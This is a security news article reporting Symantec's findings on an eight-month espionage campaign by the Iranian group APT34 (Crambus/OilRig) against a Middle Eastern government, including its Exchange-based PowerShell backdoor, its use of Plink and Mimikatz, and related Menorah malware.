Iran Traps Middle East Nation in 8-Month Espionage CampaignAPT34 Used Microsoft Exchange Server to Send Email Commands to Backdoor Malware
Iranian state-sponsored hackers conducted an eight-month espionage campaign against a Middle Eastern government, compromising dozens of computers between February and September.
See Also: AWS Security Foundations: For Dummies
Crambus, also known as APT34, OilRig or Helix Kitten, exploited publicly available tools and three previously undiscovered pieces of malware to access systems, maintain persistence and steal data, wrote security researchers at Symantec.
"The attackers stole files and passwords and, in one case, installed a PowerShell backdoor that was used to monitor incoming mails sent from an Exchange Server in order to execute commands sent by the attackers in the form of emails, and surreptitiously forwarded results to the attackers," according to the Symantec Threat Hunter Team, part of Broadcom.
The PowerShell backdoor - named Backdoor.PowerExchange - logged into a Microsoft Exchange server with hard-coded credentials to receive the email commands. The backdoor scanned for emails with "@@" in the subject line, decoded them, executed commands and deleted the emails. According to FortiGuard, APT34 used the PowerExchange backdoor for the first time in 2022 to target a government organization in the United Arab Emirates.
Crambus also used Plink, a publicly available network administration tool, to configure port-forwarding rules, enabling remote access via remote desktop protocol to compromised computers. Dick O'Brien, principal intelligence analyst for the Symantec Threat Hunter Team, told Information Security Media Group that Crambus used Plink in previous campaigns and the tool's presence helped attribute the campaign to the Iranian group.
Although attackers gained initial access in February, they waited until July to install the PowerShell backdoor to establish long-term persistence, running Plink and executing malicious code repeatedly until Symantec researchers detected potential malicious use of the network administration tool and disrupted the hackers.
Researchers have long associated Crambus with cyberespionage operations primarily targeting Middle Eastern and West Asian countries, including Saudi Arabia, Israel, the United Arab Emirates, Iraq, Jordan, Lebanon, Kuwait and Qatar. The group first appeared in 2014 and by 2019 it had deployed many malicious tools, including more than 100 web shells for creating backdoors and communicating with compromised systems (see: Despite Doxing, OilRig APT Group Remains a Threat).
According to Mandiant, APT34 conducts reconnaissance operations to benefit Iranian nation-state interests and hunts for information that contains references to Iran and the use of Iranian infrastructure. CrowdStrike said the group has primarily targeted the aviation, energy, financials, government and hospitality sectors.
The Symantec Threat Hunter Team said the cyberespionage actors used the Mimikatz credential dumping tool and an info-stealer malware - Infostealer.Clipog - to steal credentials and compromise computers connected to the targeted Middle Eastern entity's information network.
After gaining access to a computer, the attackers used a renamed version of Plink to establish remote access and executed a netstat command to retrieve a full list of all TCP and UDP connections.
Cybersecurity company Trend Micro in September attributed to APT34 a cyberespionage operation that used a novel malware - dubbed Menorah - to target a Saudi Arabian entity. The malware could identify a compromised machine, read and upload files from the machine, and download additional files, revealing the espionage group's range of tools and technical capability to deploy custom tools based on its objectives.
"APT34 demonstrates their vast resources and varied skills, and will likely persist in customizing routines and social engineering techniques to use per targeted organization to ensure success in intrusions, stealth and cyberespionage," Trend Micro said.